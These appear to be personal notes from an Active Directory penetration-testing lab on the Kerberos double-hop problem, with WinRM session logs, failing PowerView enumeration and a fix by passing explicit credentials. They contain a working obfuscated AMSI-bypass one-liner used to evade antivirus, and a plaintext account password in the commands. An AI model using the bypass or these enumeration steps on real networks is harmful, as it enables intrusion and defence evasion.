kerberos-double-hop-problem

kerberos-double-hop-problem

Kerberos Double Hop Problem

The Kerberos “Double Hop” problem appears when an attacker attempts to use Kerberos authentication across two hops, for example using PowerShell/WinRM.

When an authentication occurs through Kerberos, credentials aren’t cached in memory. Therefore, if you run mimikatz you won’t find credentials of the user in the machine even if he is running processes.

*Evil-WinRM* PS C:\Users\backupadm\Documents> import-module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\backupadm\Documents> get-domainuser -spn
Exception calling "FindAll" with "0" argument(s): "An operations error occurred.
"
At C:\Users\backupadm\Documents\PowerView.ps1:5253 char:20
+             else { $Results = $UserSearcher.FindAll() }
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DirectoryServicesCOMException

.

PS C:\Users\student98> Enter-PSSession -ComputerName dcorp-mgmt -Credential (Get-Credential)

cmdlet Get-Credential at command pipeline position 1
Supply values for the following parameters:
Credential
[dcorp-mgmt]: PS C:\Users\svcadmin\Documents> Get-Process -IncludeUserName | Where-Object { $_.UserName -match "svcadmin" }

Handles      WS(K)   CPU(s)     Id UserName               ProcessName
-------      -----   ------     -- --------               -----------
    777     257396     3.39   3024 dcorp\svcadmin         sqlservr
    593      88236     0.63   3828 dcorp\svcadmin         wsmprovhost


[dcorp-mgmt]: PS C:\Users\svcadmin\Documents> ipconfig

Windows IP Configuration
Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::c25d:bab:73a4:80bc%6
   IPv4 Address. . . . . . . . . . . : 172.16.4.44
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.4.254
[dcorp-mgmt]: PS C:\Users\svcadmin\Documents> net user /domain
The request will be processed at a domain controller for domain dollarcorp.moneycorp.local.

net : System error 5 has occurred.
    + CategoryInfo          : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

Access is denied.
[dcorp-mgmt]: PS C:\Users\svcadmin\Documents>

[dcorp-mgmt]: PS C:\program files> . ./PowerView.ps1
At C:\program files\PowerView.ps1:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

[dcorp-mgmt]: PS C:\program files> S`eT-It`em ( 'V'+'aR' +  'IA' + (("{1}{0}"-f'1','blE:')+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a'))  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
[dcorp-mgmt]: PS C:\program files> . ./PowerView.ps1
[dcorp-mgmt]: PS C:\program files> Get-NetUser
Exception calling "FindAll" with "0" argument(s): "An operations error occurred.
"
At C:\program files\PowerView.ps1:23860 char:20
+             else { $Results = $Searcher.FindAll() }
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DirectoryServicesCOMException

[dcorp-mgmt]: PS C:\program files>
[dcorp-mgmt]: PS C:\program files> Invoke-CheckLocalAdminAccess

ComputerName IsAdmin
------------ -------
localhost       True


[dcorp-mgmt]: PS C:\program files> Get-NetComputer
Exception calling "FindAll" with "0" argument(s): "An operations error occurred.
"
At C:\program files\PowerView.ps1:23860 char:20
+             else { $Results = $Searcher.FindAll() }
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DirectoryServicesCOMException

[dcorp-mgmt]: PS C:\program files> klist

Current LogonId is 0:0x380101

Cached Tickets: (2)

#0>     Client: svcadmin @ DOLLARCORP.MONEYCORP.LOCAL
        Server: dcorp-mgmt$ @
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 12/19/2025 5:49:20 (local)
        End Time:   12/19/2025 6:04:20 (local)
        Renew Time: 12/25/2025 21:01:46 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x4 -> S4U
        Kdc Called: dcorp-dc.dollarcorp.moneycorp.local

#1>     Client: svcadmin @ DOLLARCORP.MONEYCORP.LOCAL
        Server: HTTP/dcorp-mgmt @ DOLLARCORP.MONEYCORP.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 12/19/2025 3:25:46 (local)
        End Time:   12/19/2025 13:25:46 (local)
        Renew Time: 0
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x8 -> ASC
        Kdc Called:
[dcorp-mgmt]: PS C:\program files>

.

Troubleshoot
[dcorp-mgmt]: PS C:\program files> $SecPassword = ConvertTo-SecureString '*ThisisBlasphemyThisisMadness!!' -AsPlainText -Force

[dcorp-mgmt]: PS C:\program files> $Cred = New-Object System.Management.Automation.PSCredential('DOLLARCORP.MONEYCORP.LOCAL\svcadmin', $SecPassword)
[dcorp-mgmt]: PS C:\program files> get-domainuser -spn -credential $Cred | select samaccountname

thus solution = specifying the -credential flag
[dcorp-mgmt]: PS C:\program files> $SecPassword = ConvertTo-SecureString '*ThisisBlasphemyThisisMadness!!' -AsPlainText -Force
[dcorp-mgmt]: PS C:\program files> $Cred = New-Object System.Management.Automation.PSCredential('DOLLARCORP.MONEYCORP.LOCAL\svcadmin', $SecPassword)
[dcorp-mgmt]: PS C:\program files> get-domainuser -spn -credential $Cred | select samaccountname

samaccountname
--------------
krbtgt
websvc
svcadmin

[dcorp-mgmt]: PS C:\program files> get-netuser -credential $Cred | select samaccountname

samaccountname
--------------
Administrator
Guest
krbtgt
sqladmin
websvc
srvadmin
appadmin
svcadmin
etc....

.

Resource :
Kerberos Double Hop Problem – HackTricksbook.hacktricks.xyz